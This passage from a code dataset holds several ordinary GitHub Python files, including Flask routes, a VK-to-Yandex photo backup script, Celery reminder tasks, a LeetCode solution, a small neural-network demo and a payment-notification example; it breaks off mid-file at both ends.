if student is checked in, template dispays this version of the form\n if undo_check_in_form.validate_on_submit() and checked_in is True:\n # deletes the last record for that student in attendance table\n delete_record = Attendance. \\\n query.filter_by(**kwargs).order_by(Attendance.id.desc()).first()\n\n # undoes the check in for today's date\n db.session.delete(delete_record)\n db.session.commit()\n return redirect(url_for('main.view_student', id=id))\n\n return render_template(\n 'view_student.html',\n title='Student',\n check_in_form=check_in_form,\n undo_check_in_form=undo_check_in_form,\n checked_in=checked_in,\n attendance=attendance,\n today=today,\n student=student)\n\n\n@bp.route('/view_teacher/', methods=['GET', 'POST'])\n@login_required\ndef view_teacher(id):\n teacher = Teachers.query.get(id)\n\n return render_template(\n 'view_teacher.html',\n title='Teacher',\n teacher=teacher)\n","repo_name":"iotenti/scheduling-app","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":19295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"8251276972","text":"from pprint import pprint\nimport requests\nimport os\nimport time\nfrom tqdm import tqdm\n\nmylist = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nfor i in tqdm(mylist):\n time.sleep(1)\n\nvk_token = ''\n\n\ndef create_local_directory():\n path = 'images'\n os.mkdir(path)\n\n\ndef get_photo(owner_id, directory):\n url_vk = 'https://api.vk.com/method/photos.get'\n params_vk = {\n 'access_token': vk_token,\n 'album_id': 'wall',\n 'extended': 1,\n 'v': '5.131'\n }\n img = requests.get(url=url_vk, params=params_vk).json()\n res_vk = img['response']['items']\n for el in res_vk:\n image_name = str(el['likes']['count'])\n info = {}\n info.setdefault(image_name, el['sizes'][9]['url'])\n for k, v in info.items():\n file_name = k + '.jpg'\n img_data = requests.get(el['sizes'][9]['url']).content\n with open(f'{directory}/{file_name}', 'wb') as file:\n file.write(img_data)\n return\n\n\nya_token = \"\"\n\n\nclass YaUploader:\n def __init__(self, token: str):\n self.token = token\n\n def get_headers(self):\n return {\n 'Content-Type': 'application/json',\n 'Authorization': 'OAuth {}'.format(self.token)\n }\n\n def get_files_list(self):\n files_url = 'https://cloud-api.yandex.net/v1/disk/resources/files'\n headers = self.get_headers()\n response = requests.get(files_url, headers=headers)\n return response.json()\n\n def _get_upload_link(self, disk_file_path):\n upload_url = 'https://cloud-api.yandex.net/v1/disk/resources/upload'\n headers = self.get_headers()\n params = {'path': disk_file_path, 'overwrite': 'true'}\n response = requests.get(url=upload_url, headers=headers, params=params)\n return response.json()\n\n def create_directory(self, dir_name: str):\n url = \"https://cloud-api.yandex.net/v1/disk/resources/\"\n headers = {\n \"Accept\": \"application/json\",\n \"Authorization\": \"OAuth \" + ya_token\n }\n params = {\n 'path': dir_name\n }\n r = requests.put(url=url, params=params, headers=headers)\n res = r.json()\n\n def upload_files_to_disk(self, disk_file_path, file_name):\n self.create_directory('Photo_vk')\n href = self._get_upload_link(disk_file_path=disk_file_path).get('href', '')\n response = requests.put(url=href, data=open(file_name, 'rb'))\n if response.status_code == 201:\n pprint('Success')\n else:\n pprint('False')\n\n\nif __name__ == '__main__':\n create_local_directory()\n get_photo(310885834, 'images')\n ya = YaUploader(token=ya_token)\n ya.upload_files_to_disk('Photo_vk/26.jpg', 'images/26.jpg')\n ya.upload_files_to_disk('Photo_vk/29.jpg', 'images/29.jpg')\n ya.upload_files_to_disk('Photo_vk/6.jpg', 'images/6.jpg')\n ya.upload_files_to_disk('Photo_vk/34.jpg', 'images/34.jpg')\n","repo_name":"BariGisher20/Backup","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24043395487","text":"import argparse\nimport pandas as pd\nfrom utils import get_beer_styles, get_beer_style_info, get_brewery_info\n\n\nclass BeerMasterTables:\n def get_master_table():\n beer_style_links, beer_style_names = get_beer_styles()\n beer_style_info_lists = [get_beer_style_info(n, l) for n,l in zip(beer_style_names, beer_style_links)]\n beer_df = pd.concat(beer_style_info_lists, axis=0)\n # beer_df.to_gbq(project_id='scarlet-labs',\n # destination_table=\"beer.beer_info_master_table\",\n # if_exists=\"replace\",\n # verbose=False)\n return beer_df\n\n def get_brewery_table():\n beer_df = pd.read_gbq(project_id='scarlet-labs',\n query=\"select * from `scarlet-labs.beer.beer_info_master_table` order by ratings desc\",\n dialect='standard',\n verbose=False)\n brewery_df_list = [get_brewery_info(x) for x in beer_df[\"brewery_link\"].unique()]\n brewery_df = pd.concat(brewery_df_list).join(beer_df[[\"brewery_link\", \"brewery\"]].drop_duplicates().set_index(\"brewery_link\")).reset_index().rename(columns={\"index\":\"brewery_link\"})\n # beer_df.to_gbq(project_id='scarlet-labs',\n # destination_table=\"beer.brewery_info\",\n # if_exists=\"replace\",\n # verbose=False)\n return brewery_df\n\n\n\ndef main(argv=None):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--table-type',\n dest='table_type',\n default = 'brewery',\n help='Brewery or Beers')\n\n args, _ = parser.parse_known_args(argv)\n\n if args.table_type.lower() == \"brewery\":\n print((\"Getting Brewery Info\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n df = BeerMasterTables.get_brewery_table()\n print((\"Writing Output\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n df.to_csv(\"brewery_info.csv\", index=False)\n else:\n print((\"Getting Master Info\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n df = BeerMasterTables.get_master_table()\n print((\"Writing Output\", datetime.now().strftime(\"%Y%m%d %H:%M:%S\")))\n df.to_csv(\"beer_info_master_table.csv\", index=False)\n\nif __name__ == '__main__':\n main()\n","repo_name":"meirelon/beer-recommendations","sub_path":"BeerMasterTables.py","file_name":"BeerMasterTables.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73311596558","text":"# ------------------------------\n# 42. Trapping Rain Water\n# \n# Description:\n# Given n non-negative integers representing an elevation map where the width of each \n# bar is 1, compute how much water it is able to trap after raining.\n# (see picture on the website)\n# \n# Example:\n# Input: [0,1,0,2,1,0,1,3,2,1,2,1]\n# Output: 6\n# \n# Version: 2.0\n# 11/09/19 by Jianfa\n# ------------------------------\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n res = 0\n current = 0\n stack = []\n while current < len(height):\n while stack and height[current] > height[stack[-1]]:\n last = stack.pop()\n if not stack:\n # if stack is empty after popping last out\n break\n distance = current - stack[-1] - 1 # get horizontal distance between current and left bar of the last\n height_diff = min(height[stack[-1]], height[current]) - height[last] # get the height distance between a lower bar and height[last]\n res += distance * height_diff\n \n stack.append(current)\n current += 1\n \n return res\n\n# Used for testing\nif __name__ == \"__main__\":\n test = Solution()\n\n# ------------------------------\n# Summary:\n# Stack solution from https://leetcode.com/problems/trapping-rain-water/solution/\n# More concise than mine. It leverage the status of stack. If stack is empty, that means\n# current bar is the only higher bar than last bar so far. Otherwise, there must be a\n# left higher bar so that form a trap between it and current bar.\n# Repeat this until there is no lower bar than current one.\n# \n# O(n) time and O(n) space","repo_name":"Hellofafar/Leetcode","sub_path":"Hard/42_2.py","file_name":"42_2.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"1122852452","text":"import datetime\nfrom celery import shared_task\nimport environ\n\nfrom .models import Event, AttendeesEvents, User, RecurringPattern, EventExceptionCancelledRescheduled, StatusUsersLocations\nfrom .views_attend import get_count_event_specific\nfrom .views_events import events_list, return_date_based_pattern\nfrom .notification_manager import send_email\n\n\nenv = environ.Env()\n# reading .env file\nenviron.Env.read_env()\nemail_gmail = env(\"email_gmail\")\n\n\n@shared_task()\ndef send_1_day_reminder_attend():\n today = datetime.datetime.now()\n days = 1\n days_added = datetime.timedelta(days=days)\n date_to = today + days_added\n # print(date_to.strftime(\"%Y-%m-%d\"))\n attendees = AttendeesEvents.objects.filter(event_date=date_to.strftime(\"%Y-%m-%d\"))\n list_users = []\n for y in attendees:\n # print(y.event_date)\n list_users.append(y.user)\n # print(list_users)\n send_email(5, list_users, email_gmail, date=date_to.strftime(\"%Y-%m-%d\"))\n\n\n@shared_task()\ndef send_2_days_reminder_non_attendees():\n today = datetime.datetime.now()\n days = 2\n days_added = datetime.timedelta(days=days)\n date_from = today + days_added\n date_from_bis = datetime.datetime(date_from.year, date_from.month, date_from.day)\n date_to = date_from_bis + datetime.timedelta(minutes=1439)\n events_to_check = events_list(date_from=date_from_bis, date_to=date_to)\n for i in events_to_check:\n distrib_date = Event.objects.get(uuid=i[1][0]['uuid'])\n nb_benev = get_count_event_specific(distrib_date, date_to.strftime(\"%Y-%m-%d\"))\n if distrib_date.pre_alert_non_attendees_status and distrib_date.pre_alert_non_attendees_nb_attendees > nb_benev:\n list_users = []\n attendees = [y.user for y in AttendeesEvents.objects.filter(event_date=date_to.strftime(\"%Y-%m-%d\"), parent_event=distrib_date)]\n for z in StatusUsersLocations.objects.filter(distrib=distrib_date):\n if z.user not in attendees:\n list_users.append(z.user)\n # print(list_users)\n send_email(8, list_users, email_gmail, date=date_to.strftime(\"%Y-%m-%d\"), distrib=distrib_date.name)\n\n\n@shared_task()\ndef say_hello():\n print('bonjour')","repo_name":"tbonnard/association_benevoles","sub_path":"monespace/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"43506613340","text":"class Father:\n def __init__(self):\n self.fname = ''\n self.fage = 0\n self.ftalents = []\n\n\nclass Mother:\n def __init__(self):\n self.mname = ''\n self.mage = 0\n self.mtalents = []\n\n\nclass Child(Father, Mother):\n def __init__(self):\n Father.__init__(self)\n Mother.__init__(self)\n\n\n def getChildDetails(self):\n self.fname = input(\"Father Name : \")\n self.fage = int(input(\"Father Age : \"))\n res = ''\n while True:\n res = input(\"Father Talents : \")\n if res == 'x':\n break\n self.ftalents.append(res)\n self.mname = input(\"Mother Name : \")\n self.mage = int(input(\"Mother Age : \"))\n res = ''\n while True:\n res = input(\"Mother Talents : \")\n if res == 'x':\n break\n self.mtalents.append(res)\n self.cname = input(\"Child Name : \")\n self.cage = int(input(\"Child Age : \"))\n self.cgender = input(\"Child Gender : \")\n print(\"Father\\n\", self.fname, \" \", self.fage, \" \", self.ftalents)\n print(\"Mother\\n\", self.mname, \" \", self.mage, \" \", self.mtalents)\n print(\"Child\\n\", self.cname, \" \", self.cage, \" \", self.cgender)\n\n def displayTalents(self):\n for i in self.ftalents:\n for j in self.mtalents:\n if i == j:\n print(i)\n break\n\n\na = Child()\na.getChildDetails()\na.displayTalents()\n\n\n\n\n","repo_name":"zeus-12/ED5350-lab","sub_path":"LAB_6/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"8905501107","text":"\"\"\"\n- Author: Haoxin Lin\n- E-mail: linhx36@outlook.com\n- Date: 2020.11.10\n- Brief: Test NeuralNetwork with watermelon dataset 3.0α\n\"\"\"\n\nimport xlrd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom NeuralNetwork import NN\n\n# load data\ndata = xlrd.open_workbook('../WTMLDataSet_3.0alpha.xlsx')\ntable = data.sheet_by_name('WTML')\n\ndataset = []\nfor i in range(table.nrows):\n line = table.row_values(i)\n dataset.append(line)\ndataset = np.array(dataset)\n\nxs = dataset[1:, 1:-1].astype(np.float64)\nys = (dataset[1:, -1]=='是').astype(np.int32)\n\n# train a neural network to learn from watermelon dataset\nnn = NN([xs.shape[1], 16, len(set(ys))], [\"sigmoid\", \"softmax\"], lr_init=0.1, regularization=None)\nfor batch_idx in range(50000):\n nn.train(xs, ys)\n if batch_idx % 100 == 0:\n print(\"Loss = %.4f\"%nn.loss)\n\n# calculate accuracy\npreds = nn.forward(xs)\npreds = np.argmax(preds, axis=-1)\nprint(\"Accuracy: %.4f\"%np.mean(preds==ys))\n\n# plot data\npositive_xs = xs[ys==1]\nnegative_xs = xs[ys==0]\nplt.scatter(positive_xs[:, 0], positive_xs[:, 1], c='#00CED1', s=60, label='Great (positive)')\nplt.scatter(negative_xs[:, 0], negative_xs[:, 1], c='#DC143C', s=60, label='Awful (negative)')\n\n# partition\nx0, x1 = 1000, 1000\nx0, x1 = np.meshgrid(np.linspace(0, 1, x0), np.linspace(0, 1, x1))\nxs = np.concatenate([x0.reshape(1000000, 1), x1.reshape(1000000, 1)], axis=-1)\npreds = np.argmax(nn.forward(xs), axis=-1).reshape(x0.shape)\nplt.contour(x0, x1, preds, [0.5], linewidths=2, colors='m')\n\nplt.xlabel(\"x[0]: Density\")\nplt.ylabel(\"x[1]: Sugar Content\")\nplt.legend()\nplt.show()","repo_name":"HxLyn3/Machine-Learning","sub_path":"05 Neural Network/5.5/test_alpha.py","file_name":"test_alpha.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"21406073682","text":"\"\"\" Version of slider example that uses a Python function as a callback,\nwhich is transpiled to JavaScript using PScript. Read more on PScript\nhere:\n\n http://pscript.readthedocs.org\n\n\"\"\"\n\nimport numpy as np\n\nfrom bokeh. layouts import row, column\nfrom bokeh.plotting import figure, output_file, show, ColumnDataSource\nfrom bokeh.models import CustomJS, Slider\n\nx = np.linspace(0, 10, 500)\ny = np.sin(x)\n\nsource = ColumnDataSource(data=dict(x=x, y=y))\n\nplot = figure(y_range=(-10, 10), plot_width=400, plot_height=400)\n\nplot.line('x', 'y', source=source, line_width=3, line_alpha=0.6)\n\ndef callback(source=source, window=None, amp=None, freq=None, phase=None, offset=None):\n data = source.data\n A, B = amp.value, offset.value\n k, phi = freq.value, phase.value\n x, y = data['x'], data['y']\n for i in range(len(x)):\n y[i] = B + A * window.Math.sin(k * x[i] + phi)\n source.change.emit()\n\n# turn our function into a CustomJS object.\n# print(callback.code) to see the generated JavaScript code\ncallback = CustomJS.from_py_func(callback)\n\namp_slider = Slider(start=0.1, end=10, value=1, step=.1,\n title=\"Amplitude\", callback=callback)\ncallback.args[\"amp\"] = amp_slider\n\nfreq_slider = Slider(start=0.1, end=10, value=1, step=.1,\n title=\"Frequency\", callback=callback)\ncallback.args[\"freq\"] = freq_slider\n\nphase_slider = Slider(start=0, end=6.4, value=0, step=.1,\n title=\"Phase\", callback=callback)\ncallback.args[\"phase\"] = phase_slider\n\noffset_slider = Slider(start=-5, end=5, value=0, step=.1,\n title=\"Offset\", callback=callback)\ncallback.args[\"offset\"] = offset_slider\n\nlayout = row(\n plot,\n column(amp_slider, freq_slider, phase_slider, offset_slider),\n)\n\noutput_file(\"python_callback.html\", title=\"python_callback.py example\")\n\nshow(layout)\n","repo_name":"saturncloud/saturn-cloud-examples","sub_path":"bokeh-examples/plotting/file/python_callback.py","file_name":"python_callback.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"29"} +{"seq_id":"22567387101","text":"# Constants\nSUBAREAS = (\n ('programación', [\n ('paradigmas', 'Paradigmas de Programación'),\n ('poo', 'Programación Orientada a Objetos'),\n ('back end', 'Back End'),\n ('patrones', 'Patrones de Diseño'),\n ]),\n ('matemáticas', [\n ('algebra', 'Algebra Lineal'),\n ('calculo', 'Calculo'),\n ('computacionales', 'Matematicas Computacionales'),\n ('estadistica', 'Probabilidad y Estadistica'),\n ]),\n ('redes', [\n ('diseño', 'Diseño de redes'),\n ('configuracion', 'Configuración de Redes'),\n ('administracion', 'Administración de Redes'),\n ]),\n ('front end', [\n ('ui', 'User Interfaces'),\n ('ux', 'User Experience'),\n ('maquetado', 'Maquetado de interfaces'),\n ]),\n ('ingles', [\n ('ingles uno', 'Ingles I'),\n ('ingles dos', 'Ingles II'),\n ('ingles tres', 'Ingles III'),\n ('ingles cuatro', 'Ingles IV'),\n ('preparación', 'Preparación TOEFL'),\n ]),\n ('bases de datos', [\n ('administracion', 'Administración de B.D.'),\n ('sql', 'SQL'),\n ('no sql', 'NoSQL'),\n ]),\n ('paralelo', [\n ('cuda', 'Cuda'),\n ('pycuda', 'PyCuda'),\n ]),\n ('imagenes', [\n ('movimiento', 'Detección de Movimiento'),\n ('objetos', 'Detección de Objetos'),\n ]),\n)\n\nTRANSLATE_DAYS = {\n \"Monday\": \"Lunes\", \n \"Tuesday\": \"Martes\", \n \"Wednesday\": \"Miercoles\", \n \"Thursday\": \"Jueves\", \n \"Friday\": \"Viernes\"\n}\n","repo_name":"EdgarGZ/Doceo","sub_path":"doceo/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12082267536","text":"import time\nimport os\nimport random\nimport string\nimport requests\nfrom multiprocessing.pool import ThreadPool\n\nimport plotly.graph_objects as go\n\n\ndef clear_img_folder():\n \"\"\"Clean img directory after download images\"\"\"\n path = os.path.join(os.getcwd(), 'img')\n for file in os.listdir(path):\n file_path = os.path.join(path, file)\n if os.path.isfile(file_path):\n os.remove(file_path)\n\n\nclass Timer:\n def __init__(self):\n self.start_time = None\n self.end_time = None\n\n def __enter__(self):\n self.start_time = time.time()\n return self\n\n def __exit__(self, type, value, traceback):\n self.end_time = time.time()\n\n def get_elapsed_time(self):\n return self.end_time - self.start_time\n\n\ndef fetch_pic(num_pic):\n url = 'https://picsum.photos/400/600'\n path = os.path.join(os.getcwd(), 'img')\n for _ in range(num_pic):\n random_name = ''.join(random.choices(string.ascii_letters + string.digits, k=5))\n response = requests.get(url)\n if response.status_code == 200:\n with open(f'{path}/{random_name}.jpg', 'wb') as f:\n f.write(response.content)\n\n\nDATA_SIZE = 150\n\nnumber_workers = []\ntime_work = []\n\nfor workers in range(10, 101, 10):\n with Timer() as timer:\n with ThreadPool(workers) as pool:\n input_data = [DATA_SIZE // workers for _ in range(workers)]\n pool.map(fetch_pic, input_data)\n number_workers.append(workers)\n elapsed_time = round(timer.get_elapsed_time(), 2)\n time_work.append(elapsed_time)\n clear_img_folder()\n time.sleep(1)\n print(f\"number {workers} done\")\n\nfig = go.Figure(\n data=[go.Scatter(x=number_workers,\n y=time_work, mode='lines+markers')],\n)\nfig.show()\n","repo_name":"vsrede/ithillel_pro_python_voriekhov","sub_path":"homework_29/task_1/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6383849544","text":"from typing import Any, Dict, List, Optional, Union\n\nimport numpy as np\nfrom torch import nn\n\nfrom ..constants import COLUMN, NUMERICAL\nfrom .collator import StackCollator\n\n\nclass NumericalProcessor:\n \"\"\"\n Prepare numerical data for the model specified by \"prefix\".\n For multiple models requiring numerical data, we need to create a NumericalProcessor\n for each related model so that they will have independent input.\n \"\"\"\n\n def __init__(\n self,\n model: nn.Module,\n merge: Optional[str] = \"concat\",\n requires_column_info: bool = False,\n ):\n \"\"\"\n Parameters\n ----------\n model\n The model for which this processor would be created.\n merge\n How to merge numerical features from multiple columns in a multimodal pd.DataFrame.\n Currently, it only supports one choice:\n - concat\n Concatenate the numerical features.\n requires_column_info\n Whether to require feature column information in dataloader.\n \"\"\"\n self.prefix = model.prefix\n self.merge = merge\n self.requires_column_info = requires_column_info\n\n @property\n def numerical_key(self):\n return f\"{self.prefix}_{NUMERICAL}\"\n\n @property\n def numerical_column_prefix(self):\n return f\"{self.numerical_key}_{COLUMN}\"\n\n def collate_fn(self, numerical_column_names: List) -> Dict:\n \"\"\"\n Collate individual samples into a batch. Here it stacks numerical features.\n This function will be used when creating Pytorch DataLoader.\n\n Returns\n -------\n A dictionary containing one model's collator function for numerical features.\n \"\"\"\n fn = {}\n if self.requires_column_info:\n assert numerical_column_names, \"Empty numerical column names.\"\n for col_name in numerical_column_names:\n fn[f\"{self.numerical_column_prefix}_{col_name}\"] = StackCollator()\n\n fn[self.numerical_key] = StackCollator()\n\n return fn\n\n def process_one_sample(\n self,\n numerical_features: Dict[str, float],\n ) -> Dict:\n \"\"\"\n Process one sample's numerical features.\n Here it converts numerical features to a NumPy array.\n\n Parameters\n ----------\n numerical_features\n Numerical features of one sample.\n\n Returns\n -------\n A dictionary containing the processed numerical features.\n \"\"\"\n ret = {}\n if self.requires_column_info:\n # TODO: consider moving this for loop into __init__() since each sample has the same information.\n for i, col_name in enumerate(numerical_features.keys()):\n ret[f\"{self.numerical_column_prefix}_{col_name}\"] = i\n\n if self.merge == \"concat\":\n ret[self.numerical_key] = np.array(list(numerical_features.values()), dtype=np.float32)\n else:\n raise ValueError(f\"Unknown merging type: {self.merge}\")\n\n return ret\n\n def __call__(\n self,\n numerical_features: Dict[str, float],\n feature_modalities: Dict[str, Union[int, float, list]],\n is_training: bool,\n ) -> Dict:\n \"\"\"\n Extract one sample's numerical features and customize it for a specific model.\n\n Parameters\n ----------\n numerical_features\n Numerical features of one sample.\n feature_modalities\n The modality of the feature columns.\n is_training\n Whether to do processing in the training mode. This unused flag is for the API compatibility.\n\n Returns\n -------\n A dictionary containing one sample's processed numerical features.\n \"\"\"\n return self.process_one_sample(numerical_features)\n","repo_name":"autogluon/autogluon","sub_path":"multimodal/src/autogluon/multimodal/data/process_numerical.py","file_name":"process_numerical.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":6431,"dataset":"github-code","pt":"29"} +{"seq_id":"36025032085","text":"from sqlalchemy import create_engine, Column, Integer, String, Interval, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom database import Base\n\nclass Tasks(Base):\n __tablename__ = \"tasks\"\n id = Column('id', Integer, primary_key=True)\n task_name = Column('task_name', String)\n priority_level = Column('priority_level', Integer)\n length = Column('length', Integer)\n\nclass PriorityQueue(Base):\n __tablename__ = \"priority_queue\"\n id = Column('id', Integer, primary_key = True)\n task_id = Column(Integer, ForeignKey('tasks.id'))\n robot_id=Column('robot_id', Integer)\n status = Column('status', String)\n task = relationship(\"Tasks\", backref=\"queued\")","repo_name":"jadcarson/robot_queue","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1936937824","text":"import facebook\n\nfrom utils.db import db\nfrom utils.html2text_processor import html2text_processor\n\nfb_access_token = db.get('fb_access_token')\nif not fb_access_token:\n raise Exception('FB Access Token not found. Run authorize_fb.py first.')\n\nfb_page_id = db.get('fb_page_id')\nif not fb_page_id:\n raise Exception('FB Page ID not found. Run authorize_fb.py first.')\n\ngraph = facebook.GraphAPI(fb_access_token, version='2.5')\n\n\ndef post_fb(rss_entry):\n image = None\n for url in [link.href for link in rss_entry.links if 'image' in link.type]:\n image = url\n break\n\n result = graph.put_object(\n fb_page_id, 'feed',\n message=html2text_processor.handle(rss_entry.summary),\n link=rss_entry.link,\n picture=image,\n )\n\n pass\n","repo_name":"diraven/rss_to_socialnetworks","sub_path":"utils/post_fb.py","file_name":"post_fb.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22199795843","text":"from redsysAPI import Client\nimport json\n\nREDSYS_MERCHANT_CODE = 'your_merchant_code_here'\nREDSYS_SECRET_KEY = 'your_secret_code_here'\n\n# State if you are using the test environment (True)\n# or the real environment for payments (False)\nSANDBOX = True\n\nif request.POST.has_key('Ds_SignatureVersion'):\n # get the signature from Redsys\n Response_signature = request.POST['Ds_Signature']\n # get the encrypted parameters from Redsys\n parameters = request.POST['Ds_MerchantParameters']\n \n # Init the Redsys API with your merchant code and key:\n redsyspayment = Client(business_code=REDSYS_MERCHANT_CODE, priv_key=REDSYS_SECRET_KEY, sandbox=SANDBOX)\n \n # Calculate the signature from the parameters provided by Redsys\n signature = redsyspayment.redsys.createMerchantSignatureNotif(REDSYS_SECRET_KEY, parameters)\n \n # Check if the calculated signature equals to the one sent by Redsys:\n if signature == Response_signature:\n \n # You can trust the data in parameters... Now decode them into a dict:\n data = redsyspayment.redsys.decodeMerchantParametersJson(parameters)\n \n # Continue your processing\n # .\n # .\n # . \n","repo_name":"javivicente/RedsysAPI","sub_path":"notification_example.py","file_name":"notification_example.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"40124091836","text":"import sys\nimport os\nimport re\nfrom collections import Counter\nfrom nltk.tokenize import word_tokenize \nimport nltk \nfrom datetime import datetime\nimport pickle\nimport math\nfrom utils import textprocessing,helpers\n\n# Loading resource files and the stopword file and save it as global variable.\nresources_path = os.path.join(os.getcwd(), 'resources')\ndata_path = os.path.join(os.getcwd(), 'data')\nstopwords_file = os.path.join(resources_path, 'stopwords_en.txt')\nstopwords = helpers.get_stopwords(stopwords_file)\n\n\ncorpus=[]\ndoc_id_list = []\n\n# Function to find the special tag words.\ndef find_fun(read,s,s1):\n res = [i for i in range(len(read)) if read.startswith(s, i)]\n res1 = [i for i in range(len(read)) if read.startswith(s1, i)]\n \n lis = []\n l1 = len(s)\n l2 = len(s1)\n \n temp = 0;\n name = \"\"\n for i in range(len(res)):\n if(temp==0):\n t = res[i]+l1\n t1 = res1[i]-1\n name =(textprocessing.remove_nonwords((read[t:t1]).lower())).strip()\n \n if(i+1!=len(res)):\n if(res[i+1]-1 - (res1[i]+l2)==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n elif(res[i+1]-1 -(res1[i]+l2) ==1 and len(read[res1[i]+l2:res[i+1]-1].strip())==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n if temp==0:\n name = textprocessing.remove_nonwords(name)\n name = (name.lower()).strip()\n if(len(name)>0):\n lis.append(name)\n name=\"\"\n else:\n t = res[i]+l1\n t1 = res1[i]-1\n \n name = (name+\" \"+textprocessing.remove_nonwords((read[t:t1]).lower()).strip()).strip()\n if(i+1!=len(res)):\n if(res[i+1]-1 - (res1[i]+l2)==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n elif(res[i+1]-1 -(res1[i]+l2) ==1 and len(read[res1[i]+l2:res[i+1]].strip())==0):\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=1\n else:\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=0\n else:\n #print(\":\"+(clean_func(read[res[i]+l1:res1[i]-1])).strip().lower())\n keyword = (textprocessing.remove_nonwords((read[res[i]+l1:res1[i]-1]).lower())).strip()\n if(len(keyword)>0):\n lis.append(keyword)\n temp=0\n \n if temp==0:\n name = textprocessing.remove_nonwords(name.lower())\n name = name.lower().strip()\n if(len(name)>0):\n lis.append(name)\n name=\"\"\n return lis\n\ndef check_data(read):\n #global variables\n global corpus\n global stopwords\n global doc_id_list\n \n # Finding the document name from each file\n t = read.find(\"\")+7\n t1 = read.find(\"/DOCNO\")-1\n doc_id = (read[t:t1].strip())\n doc_id_list.append(doc_id)\n\n # combining text tag data if more than one text tag are present in the document\n res = [i for i in range(len(read)) if read.startswith(\"\", i)]\n res1 = [i for i in range(len(read)) if read.startswith(\"\",\"\")\n doc_text =doc_text.replace(\"\", \"\")\n doc_text =doc_text.replace(\"\", \"\")\n \n organization = find_fun(doc_text,\"\",\"\")\n doc_text =doc_text.replace(\"\", \"\")\n doc_text =doc_text.replace(\"\", \"\")\n \n location = find_fun(doc_text,\"\",\"\")\n doc_text =doc_text.replace(\"\", \"\")\n doc_text =doc_text.replace(\"\", \"\")\n \n words = textprocessing.preprocess_text(doc_text, stopwords)\n bag_of_words = Counter(words)\n counts = Counter(person)\n \n for a in counts:\n bag_of_words[\"P:\"+a]=counts[a]\n counts = Counter(location)\n \n for a in counts:\n bag_of_words[\"L:\"+a]=counts[a]\n counts = Counter(organization)\n \n for a in counts:\n bag_of_words[\"O:\"+a]=counts[a]\n \n corpus.append(bag_of_words)\n\n# funtion to read file\ndef readfile_func(path_to_file):\n read = \"\"\n list_data=[]\n with open(path_to_file, 'r') as input:\n for line in input:\n if '' in line:\n read = read + (\"\")\n check_data(read)\n read = \"\"\n read = read + line\n\ndef main(argv):\n # global variables\n global corpus\n global doc_id_list\n \n # Checking If arguments are not proper\n if(len(argv)!=2):\n print(\"--> Please check your command format\\n--> Format : python3 invidx_cons.py \\n\")\n return\n \n # If arguments are proper we will do the further processing\n out_file = argv[1]\n path_dir = argv[0]\n \n for file in os.listdir(path_dir):\n \n current_time = helpers.get_current_time()\n print(\"Analysing file : \"+path_dir+\"/\"+file +\" (Start Time = \"+current_time+\" 